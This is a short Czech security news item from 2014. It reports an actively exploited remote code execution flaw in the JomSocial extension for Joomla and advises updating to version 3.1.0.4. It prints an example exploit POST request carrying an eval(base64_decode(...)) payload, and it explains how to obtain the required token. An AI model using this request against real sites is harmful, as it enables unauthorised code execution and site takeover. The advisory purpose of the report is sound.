Zpět na seznam aktualit     Číst komentáře (0)     Verze pro tisk

Nalezena Remote Code Execution zranitelnost v jednom z rozšíření pro Joomlu

Autor: ScheRas   
12.2.2014

Tisíce webových stránek běžících na CMS Joomla! a používajících rozšíření JomSocial je náchylných k Remote Code Execution útoku.


Rozšíření je v současné době uvedeno na seznamu zranitelných pluginů. Tato chyba je hojně zneužívána a několik desítek uživatelů již hlásilo, že jim někdo naboural webové stránky.

Chyba se nachází v kontroleru "photos". Parametry zpracovávané pluginem 'Azrul' nejsou řádně escapované a jsou rovnou předány funkci call_user_func_array. To umožňuje útočníkovi zavolat libovolnou statickou třídu s použitím libovolného množství parametrů. Nebo použít CStringHelper::escape a pak spustit libovolný PHP kód.

Platný požadavek by tedy mohl vypadat nějak takto:

  1. POST / index.php HTTP/1.0
  2. Host: example.com
  3. ...
  4. option = community &
  5. no_html = 1 &
  6. task = azrul_ajax &
  7. func = fotky, ajaxUploadAvatar &
  8. TOKEN = 1 &
  9. arg2 = ["_D_", "Event"] a
  10. arg3 = ["_D_", "374"] a
  11. arg4=["_d_","%7B%22call%22%3A%5B%22CStringHelper%22%2C%22escape%22%2C%20%22%40exit%28%40eval%28%40base64_decode%28%27ZWNobyAnSGVsbG8gV29ybGQnOw%3D%3D%27%29%29%29%3B%22%2C%22assert%22%5D%7D"]
Přičemž token je třeba nahradit 32 znaků dlouhým hexa kódem, který vyčteme ze skrytého input, jenž má hodnotu 1 a najdeme na každé stránce.

Všem administrátorům používajícím toto rozšíření se doporučuje aktualizovat na nejnovější verzi 3.1.0.4.

Zdroj: https://github.com/mfontanini/Programs-Scripts/blob/master/J…


Social Bookmarking

     





Hodnocení/Hlasovalo: 0/0

1  2  3  4  5    
(známkování jako ve škole)